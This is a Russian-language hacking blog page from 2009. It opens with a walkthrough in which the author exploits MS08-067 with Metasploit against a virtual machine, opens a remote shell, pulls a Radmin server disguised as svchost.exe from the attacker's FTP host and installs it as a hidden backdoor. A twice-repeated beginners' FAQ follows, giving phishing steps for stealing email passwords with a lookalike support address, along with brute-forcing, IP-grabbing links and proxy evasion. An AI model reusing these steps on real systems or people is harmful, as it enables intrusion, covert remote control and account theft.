http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG
IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG
Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG
#ПРИМЕР.#
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Сканим комп xspider'ом
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG
Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.
http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG
use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
C:WINDOWSsystem32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG
Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.
http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG
Снял видео, там же и статья отформатированная в pdf:
http://ifolder.ru/10884195
http://kerny-auroras.blogspot.com/2009/03/windows.html
Удачи!
пʼятниця, 13 березня 2009 р.
Вопросы новичков, новичкам.
Это мануал для новичков, так сказать потому что у начинающих очень много общих вопросов, на которые иногда действительно надоедает отвечать! Я надеюсь что в этой статье я соберу самые часто задаваемые вопросы, и постораюсь ответить на все они! А также, буду ориентироватся на помощь новичкам а именно помогу немного разобратся в этот большой и не простой мир хакерства) Для удобности я разделю эту статью на части так как хакерство тоже имеет несколько направлений, а новичкам это будет сложно разберать всё что ему нужно из то что есть) Сегодня поговорим и помогу тем что хотят занятся или нуждаются в взломе и защите. По моему лучше разделить всё ниже представленное на : Часто задаваемые вопросы, Общее образование, Вирусалогия и конечно же Безопастность! Я выбрал именно эти категории так как это самые уязвимые части новичков! Все материалы и статьи ниже представленные с статье, находятся на нашем сайте www.whack.ru Это первая часть статьи. Продолжение следует)!
Часто задаваемые вопросы!
И итак, поговорим о часто задаваемых вопросах! На нашем сайте www.whack.ru
"- С чего начать? - Прочитайте эту статью, и многое станет ясным! Так же проходим квесты сайта, это много влеяет на ваше умение!"
"- Как сменить/скрыть айпи компютера? - Вам поможет прокси серверы! О них читайте чуть ниже!"
"-Как взломать е-майл? - Есть метод СИ и брутфорсер! О них читайте ниже!"
"-Забыл пароль на аську, что делать? - Пользуйтесь системой востановления пароля! Вам нужно только задать тот е-майл который был при регистрации или который сидит в аське! Пройдя всё что сказано на сайте, вы смените пароль на новый!"
Общее образование
Под терменом Общее образование я решил ставить всё что по моему должен каждый знать, вне зависимости от уровня и умения хакерства! Начать с того что такое Интернет будет глупо, так как все это знают, и кстате, щас вы читаете этот мануал через Интернет) Но я уверен что не все знают что такое порты и для чего они или как правельно искать и юзать прокси! По моему, каждый начинающий хакер должен знать хорошо что такое ip и как можно его использовать, независимо от целях! И так, поговорим в начале немного о айпи) IP это адрес компютера или сервера подключенного к Интернету. Он выглядит примерно так: 212.64.79.57. Каждый подключенный к интернету компютер имеет свой уникальный айпи адрес, и он не может быть у другово компютера одновременно! Но вы спросите: а какже быть с айпи адресами которые я видел у себя и на следующий день у друга? Дело в том что все айпи адреса разделяются на две стороны а именно: статистический айпи и меняющейся. Статистические айпи или так сказать выделенные можно иметь только если купить! Они не меняются когда вы заходите в сети. А меняющейся айпишки, они доступны для всех, и таким образом, при каждом входе в Интернет у вас будет другой айпи, хотя бывает что два, три раза под ряд может быть один и тот же айпи. Спросите вы, а что с того что мы знаем про айпи? ГЫ, все удалённые атаки начинаются от айпи адреса, то есть локализации вашей цели. Если не знать айпи цели, ни какой атаки и не может быть! Ну а если спросите как же узнать айпи, то отвечу так: есть онлайн сниферы. Если человек кликнет на ссылку под которым скрывается снифер, вы узнаете его айпи 100% Но если чел будет сидеть через прокси, тогда будет по сложней! По подробней о IP можно читать и учить http://forum.whack.ru/showthread.php?t=728 Про снифферах скожу только одно. Самые простые снифферы способны определить айпи адреса и провайдер, ну а снифферы по сложней, могут красть очень много данных! Подробней о снифферах можно читать http://forum.whack.ru/showthread.php?t=729 Дальше поговорим о прокси. Напоминаю что прокси это одна из очень необходимых утилит для хакера, особенно при атаках! Прокси это промежуточный компютер к которому вы соединяетесь. Дальше, когда вы даёте запросы, они посылаются не сразу к ресурсу (пр. к сайту которому, вам нужна посмотреть фото). Ваш запрос будет в начале отправлен к данному проски серверу(компютеру), он выполняет ваш запрос, получает ответ и посылает его вам обратно в готовом виде)) Таким образом, выходит что этот прокси сервер делает всё за вас. Это скрывает ваш настоящий айпи адрес, и при атаках, вас будет на много сложней вычеслить!! Как искать найти прокси? На нашем форуме: www.forum.whack.ru есть специальный раздел где каждые два три дня выкладываются новые прокси! Также можно юзать программы для прокси. Одна из самых простых это Hide IP. Скачать её можно www.singlewire.110mb.com/hideip.rar После установки и запуска, данная программа сама начнёт искать пркси сервер. Также в ручную можно юзать прокси. Для этого берём рабочий прокси и вставляем в браузер. Скажу что один из лучших и стабильных браузеров это Opera! Это можно делать если поковырятся в настройках браузера. Для оперы нужно Ctrl+F12 - Дополнительно - Сеть - Прокси-серверы и втавляем там. Таким образом, прокси помодет вам работать более безопасно и к тому же, ПРОКСИ ускоряет на 20-30% или даже больше работу в сети!! Ну а если спрашиваете как определить если прокси рабочий или нет, скажу что наша команда Whack Team разработала скрипт который очень легко определяет если прокси рабочие или нет! Подробней вы сможете узнать http://forum.whack.ru/showthread.php?t=1619
Поговорим о видах атаках…
Все должны знать что хакер без атаки это уже не хакер)) Давайте немного проясню что и как в домене атаках). Атаки бывают разные, и каждые более или менее продуктивны! Начнём с самого простого, но достаточного продуктивного! Поговорим о Социальной Инженерии! Между хакерах СИ это начальная стадия в атаке, особенно на е-майлах или icq. Суть атаки при помощи Си в том чтобы напудрить мозги цели, и заставить чела отдать добровольно его пароль)) Пример: Пишите челу на почту с анонимной почты. Для начала, вы напишите как администрация сервака или мыла, что типа вы увеличите обьём почты, но для этого чел должен писатьв ответ его мыло, логин и пароль) Также зарегистрируйте е-майл такой чтобы бил похож на настоящий администраторский е-майл. Пример: support@mail.ru и ваш suport@mail.ru или чтото такое. Не забываем в письме написать второй адрес е-майл для того чтобы чел отправил именно вам его пароль и т.д. Больше о Социальной инженерией можно найти http://forum.whack.ru/forumdisplay.php?f=67 Второй срупенькой атаки это насильный взлом. Если СИ не помог, идём на следующий уровень. Тут многое делает Брут-форсеры. Брут это вид атаки который делается насильным способом! Если вам нужно сломать е-майл, можно применить брутус. НО хапомните что все почтовые сервисы имеют свои отдельные брутусы и нельзя использовать один и тот же Брут к разным почтам!!! На сегодняшний день, хакеры создали Брут-форсеры для наиболее известные почтовые сервисы такие как mail.ru - yandex.ru - pochta.ru - rambler.ru и другие! Работа Брут-форсера состоит в том чтобы переберать пароль. Он делает это с помощью словарей - текстовики с листами возможных паролей. Они состовляются по длине пароля, сложность (буквы, цифры, знакиб т.д.) и по длине. Они могут быть от нескольких кб до Гб! У меня самый большой словари стоит на 4.8 гиг!)) Для брутуса чем больше словарь, тем больше шансы на находку паролей! Но таким образом появляется другая проблема, а именно время затраченное на Брут пароля. Даже если это долгий процесс, это тоже весьма продуктивный вид атаки. Так же есть и другие виды атак как XSS, SQL Injection и другие, НО это новичкам ещё рано знать! К тому же для последних вид атак нужно хорошо знать языки веб прграммирования как: php, java, perl и html. Эти виды атак вы сможете изучать и использовать но чуть пойже, когда наберёте немного опыта в хакерстве!
Вирусалогия
Все слышали о вирусах, но мало кто знает как сложно они создаются. Но не будет мы о этом говорить) Вирусалогия довольно опасная но также продуктивная ступенька в атаке! Вредоносные программы занимают почётное место среди выше напоминаемых вид атак. Вирусы, очень коварные хотя и обычные программы только с изменимым кодом. Они способны поражать всё что находится по близости, а так же только один вид программ и приложений…Всё зависит от фантазии вирусмэйкера) Обычно вирусы заражают файлы .exe .com и другие. Но с расширением и глобализацией сети Интернет, вирусмэйкеры пошли на более коварные методы! Сегодня легко можно подловить вируса если только зайти на обычную веб страницу!!! Такие вирусы заходят на ваш ПК даже не спрашивая вас) Они сами по себе начинают работать, заражать или даже уничтожать всё что встретит! Вирусы также бывают нескольких видов: вирусы заражители, Трояны, бэк-доры(Троян) и другие) Трояны эдни из самых опастных вирусов на сег день! Его можно легко подловить и очень сложно от него избавится! Принцип его действия заключается в том что он внедряется на ваш компютер и сидит там тихо. Ничего не заражает или чтото такое! Но это до тез пор, пока его отец не свяжется с ним) Чтобы понять это, я расскажу так: Троян после настройке и перед отправки к цели, он как бы разделяется на две части. Как ракета в космосе и управление с земли. Так вот, он ждёт пока с ним не свяжется его создатель(первая половина). Когда он с ним связался, тогда начинается чтото очень интересное… Троян имеет полный контроль над вашим компом. Он лего открывает, закрывает окна, программы или чтото другое. Я даже видел как хакер разговаривал с жертвой через блокнот! Вопщем, трой на вашем компе это очень серьёзная проблема.
Защита против вирусов и Троянов это антивирус, файрвол и ваша внимательность! Больше о вирусах и Троянах можно читать на нашем форуме: www.forum.whack.ru а именно здесь http://forum.whack.ru/forumdisplay.php?f=17
Безопасность
Даже если мы, хакеры, ломаем безопастность других, нам очень нужно подумать о своей безопастности, чтобы не быть на месте что и чел которого вы ломаете) Хакер, это тот кто знает очень хорошо компютер, сеть и всё что их касается, но он по настоящему становится хакером, когда он в первую очередь заботится о своей безопасности! Ведь каждая атака начинается с изучения безопастности цели и потом уже по обстоятельству выбирается метод атаки. Безопастность вашего компютера зависит только от вас и не от когото другово! Во первых, безопасность в вашем компютере…Установите антивирус мощный и надёжный! Выбор уже за вами, так как у всех разные вкусы и возможности! Из лучших антивирей могу сказать о Nod32, Kaspersky, Avast, Norton и другие! Регулярно обновляйте базы антивируса, и один раз в недели выполняйте полную проверку вашего комютера на вирусы! Это поможет вам повысить уровень безопастности! Если вы в сети стите, то не нужно забывать о Файрволе!!! Это поможет держать ваш компютер в Интернете на замке! Один из лучших файрволах это Outpost Firewall и Kaspersky Anti-Hacker) Их так же нельзя отключить при входе в Интернет! Это дело вашей безопастности! И я в начале говорил о вашей бдительности в сфере защиты, так вот, не скачайте файлы с подозрительных сайтов! Не принимайте через е-майл или пэйджеры сомнительные файлы и данные!!! Там с легкостью может быть Троян, а о нём мы уже говорили! Не распостроняйте слишком много информации о себе в Интернете, на форумах и т.д. Будьте максимально осторожны, и это вам поможет быть защищёным! Ну и как же забыть о паролях! О паролях воопще можно целую книгу написать..)) Главное! Не пишите одни и теже пароли везьде! Сторайтесь чтобы ваши пароли были не меньше 6-8 знаков а именно (3pas$w0rd!) это пример! Таким образом, будет очень сложно его ломать! Так же не кликайте на ссылки что приходят по почте или icq так как под ними может быть сниффер и злоумышленник, легко сможеть получить ваш пароль! Ещё раз, будьте Бдительны!
==================
Тут вопщем, статья и заканчивается, но не забудьте что это первая часть, и скоро будет продолжение! Также, читайте наш форум!< www.forum.whack.ru >! Наша команда всегда будет рада вам помочь!
Часто задаваемые вопросы!
И итак, поговорим о часто задаваемых вопросах! На нашем сайте www.whack.ru
"- С чего начать? - Прочитайте эту статью, и многое станет ясным! Так же проходим квесты сайта, это много влеяет на ваше умение!"
"- Как сменить/скрыть айпи компютера? - Вам поможет прокси серверы! О них читайте чуть ниже!"
"-Как взломать е-майл? - Есть метод СИ и брутфорсер! О них читайте ниже!"
"-Забыл пароль на аську, что делать? - Пользуйтесь системой востановления пароля! Вам нужно только задать тот е-майл который был при регистрации или который сидит в аське! Пройдя всё что сказано на сайте, вы смените пароль на новый!"
Общее образование
Под терменом Общее образование я решил ставить всё что по моему должен каждый знать, вне зависимости от уровня и умения хакерства! Начать с того что такое Интернет будет глупо, так как все это знают, и кстате, щас вы читаете этот мануал через Интернет) Но я уверен что не все знают что такое порты и для чего они или как правельно искать и юзать прокси! По моему, каждый начинающий хакер должен знать хорошо что такое ip и как можно его использовать, независимо от целях! И так, поговорим в начале немного о айпи) IP это адрес компютера или сервера подключенного к Интернету. Он выглядит примерно так: 212.64.79.57. Каждый подключенный к интернету компютер имеет свой уникальный айпи адрес, и он не может быть у другово компютера одновременно! Но вы спросите: а какже быть с айпи адресами которые я видел у себя и на следующий день у друга? Дело в том что все айпи адреса разделяются на две стороны а именно: статистический айпи и меняющейся. Статистические айпи или так сказать выделенные можно иметь только если купить! Они не меняются когда вы заходите в сети. А меняющейся айпишки, они доступны для всех, и таким образом, при каждом входе в Интернет у вас будет другой айпи, хотя бывает что два, три раза под ряд может быть один и тот же айпи. Спросите вы, а что с того что мы знаем про айпи? ГЫ, все удалённые атаки начинаются от айпи адреса, то есть локализации вашей цели. Если не знать айпи цели, ни какой атаки и не может быть! Ну а если спросите как же узнать айпи, то отвечу так: есть онлайн сниферы. Если человек кликнет на ссылку под которым скрывается снифер, вы узнаете его айпи 100% Но если чел будет сидеть через прокси, тогда будет по сложней! По подробней о IP можно читать и учить http://forum.whack.ru/showthread.php?t=728 Про снифферах скожу только одно. Самые простые снифферы способны определить айпи адреса и провайдер, ну а снифферы по сложней, могут красть очень много данных! Подробней о снифферах можно читать http://forum.whack.ru/showthread.php?t=729 Дальше поговорим о прокси. Напоминаю что прокси это одна из очень необходимых утилит для хакера, особенно при атаках! Прокси это промежуточный компютер к которому вы соединяетесь. Дальше, когда вы даёте запросы, они посылаются не сразу к ресурсу (пр. к сайту которому, вам нужна посмотреть фото). Ваш запрос будет в начале отправлен к данному проски серверу(компютеру), он выполняет ваш запрос, получает ответ и посылает его вам обратно в готовом виде)) Таким образом, выходит что этот прокси сервер делает всё за вас. Это скрывает ваш настоящий айпи адрес, и при атаках, вас будет на много сложней вычеслить!! Как искать найти прокси? На нашем форуме: www.forum.whack.ru есть специальный раздел где каждые два три дня выкладываются новые прокси! Также можно юзать программы для прокси. Одна из самых простых это Hide IP. Скачать её можно www.singlewire.110mb.com/hideip.rar После установки и запуска, данная программа сама начнёт искать пркси сервер. Также в ручную можно юзать прокси. Для этого берём рабочий прокси и вставляем в браузер. Скажу что один из лучших и стабильных браузеров это Opera! Это можно делать если поковырятся в настройках браузера. Для оперы нужно Ctrl+F12 - Дополнительно - Сеть - Прокси-серверы и втавляем там. Таким образом, прокси помодет вам работать более безопасно и к тому же, ПРОКСИ ускоряет на 20-30% или даже больше работу в сети!! Ну а если спрашиваете как определить если прокси рабочий или нет, скажу что наша команда Whack Team разработала скрипт который очень легко определяет если прокси рабочие или нет! Подробней вы сможете узнать http://forum.whack.ru/showthread.php?t=1619
Поговорим о видах атаках…
Все должны знать что хакер без атаки это уже не хакер)) Давайте немного проясню что и как в домене атаках). Атаки бывают разные, и каждые более или менее продуктивны! Начнём с самого простого, но достаточного продуктивного! Поговорим о Социальной Инженерии! Между хакерах СИ это начальная стадия в атаке, особенно на е-майлах или icq. Суть атаки при помощи Си в том чтобы напудрить мозги цели, и заставить чела отдать добровольно его пароль)) Пример: Пишите челу на почту с анонимной почты. Для начала, вы напишите как администрация сервака или мыла, что типа вы увеличите обьём почты, но для этого чел должен писатьв ответ его мыло, логин и пароль) Также зарегистрируйте е-майл такой чтобы бил похож на настоящий администраторский е-майл. Пример: support@mail.ru и ваш suport@mail.ru или чтото такое. Не забываем в письме написать второй адрес е-майл для того чтобы чел отправил именно вам его пароль и т.д. Больше о Социальной инженерией можно найти http://forum.whack.ru/forumdisplay.php?f=67 Второй срупенькой атаки это насильный взлом. Если СИ не помог, идём на следующий уровень. Тут многое делает Брут-форсеры. Брут это вид атаки который делается насильным способом! Если вам нужно сломать е-майл, можно применить брутус. НО хапомните что все почтовые сервисы имеют свои отдельные брутусы и нельзя использовать один и тот же Брут к разным почтам!!! На сегодняшний день, хакеры создали Брут-форсеры для наиболее известные почтовые сервисы такие как mail.ru - yandex.ru - pochta.ru - rambler.ru и другие! Работа Брут-форсера состоит в том чтобы переберать пароль. Он делает это с помощью словарей - текстовики с листами возможных паролей. Они состовляются по длине пароля, сложность (буквы, цифры, знакиб т.д.) и по длине. Они могут быть от нескольких кб до Гб! У меня самый большой словари стоит на 4.8 гиг!)) Для брутуса чем больше словарь, тем больше шансы на находку паролей! Но таким образом появляется другая проблема, а именно время затраченное на Брут пароля. Даже если это долгий процесс, это тоже весьма продуктивный вид атаки. Так же есть и другие виды атак как XSS, SQL Injection и другие, НО это новичкам ещё рано знать! К тому же для последних вид атак нужно хорошо знать языки веб прграммирования как: php, java, perl и html. Эти виды атак вы сможете изучать и использовать но чуть пойже, когда наберёте немного опыта в хакерстве!
Вирусалогия
Все слышали о вирусах, но мало кто знает как сложно они создаются. Но не будет мы о этом говорить) Вирусалогия довольно опасная но также продуктивная ступенька в атаке! Вредоносные программы занимают почётное место среди выше напоминаемых вид атак. Вирусы, очень коварные хотя и обычные программы только с изменимым кодом. Они способны поражать всё что находится по близости, а так же только один вид программ и приложений…Всё зависит от фантазии вирусмэйкера) Обычно вирусы заражают файлы .exe .com и другие. Но с расширением и глобализацией сети Интернет, вирусмэйкеры пошли на более коварные методы! Сегодня легко можно подловить вируса если только зайти на обычную веб страницу!!! Такие вирусы заходят на ваш ПК даже не спрашивая вас) Они сами по себе начинают работать, заражать или даже уничтожать всё что встретит! Вирусы также бывают нескольких видов: вирусы заражители, Трояны, бэк-доры(Троян) и другие) Трояны эдни из самых опастных вирусов на сег день! Его можно легко подловить и очень сложно от него избавится! Принцип его действия заключается в том что он внедряется на ваш компютер и сидит там тихо. Ничего не заражает или чтото такое! Но это до тез пор, пока его отец не свяжется с ним) Чтобы понять это, я расскажу так: Троян после настройке и перед отправки к цели, он как бы разделяется на две части. Как ракета в космосе и управление с земли. Так вот, он ждёт пока с ним не свяжется его создатель(первая половина). Когда он с ним связался, тогда начинается чтото очень интересное… Троян имеет полный контроль над вашим компом. Он лего открывает, закрывает окна, программы или чтото другое. Я даже видел как хакер разговаривал с жертвой через блокнот! Вопщем, трой на вашем компе это очень серьёзная проблема.
Защита против вирусов и Троянов это антивирус, файрвол и ваша внимательность! Больше о вирусах и Троянах можно читать на нашем форуме: www.forum.whack.ru а именно здесь http://forum.whack.ru/forumdisplay.php?f=17
Безопасность
Даже если мы, хакеры, ломаем безопастность других, нам очень нужно подумать о своей безопастности, чтобы не быть на месте что и чел которого вы ломаете) Хакер, это тот кто знает очень хорошо компютер, сеть и всё что их касается, но он по настоящему становится хакером, когда он в первую очередь заботится о своей безопасности! Ведь каждая атака начинается с изучения безопастности цели и потом уже по обстоятельству выбирается метод атаки. Безопастность вашего компютера зависит только от вас и не от когото другово! Во первых, безопасность в вашем компютере…Установите антивирус мощный и надёжный! Выбор уже за вами, так как у всех разные вкусы и возможности! Из лучших антивирей могу сказать о Nod32, Kaspersky, Avast, Norton и другие! Регулярно обновляйте базы антивируса, и один раз в недели выполняйте полную проверку вашего комютера на вирусы! Это поможет вам повысить уровень безопастности! Если вы в сети стите, то не нужно забывать о Файрволе!!! Это поможет держать ваш компютер в Интернете на замке! Один из лучших файрволах это Outpost Firewall и Kaspersky Anti-Hacker) Их так же нельзя отключить при входе в Интернет! Это дело вашей безопастности! И я в начале говорил о вашей бдительности в сфере защиты, так вот, не скачайте файлы с подозрительных сайтов! Не принимайте через е-майл или пэйджеры сомнительные файлы и данные!!! Там с легкостью может быть Троян, а о нём мы уже говорили! Не распостроняйте слишком много информации о себе в Интернете, на форумах и т.д. Будьте максимально осторожны, и это вам поможет быть защищёным! Ну и как же забыть о паролях! О паролях воопще можно целую книгу написать..)) Главное! Не пишите одни и теже пароли везьде! Сторайтесь чтобы ваши пароли были не меньше 6-8 знаков а именно (3pas$w0rd!) это пример! Таким образом, будет очень сложно его ломать! Так же не кликайте на ссылки что приходят по почте или icq так как под ними может быть сниффер и злоумышленник, легко сможеть получить ваш пароль! Ещё раз, будьте Бдительны!
==================
Тут вопщем, статья и заканчивается, но не забудьте что это первая часть, и скоро будет продолжение! Также, читайте наш форум!< www.forum.whack.ru >! Наша команда всегда будет рада вам помочь!
Підписатися на:
Дописи (Atom)
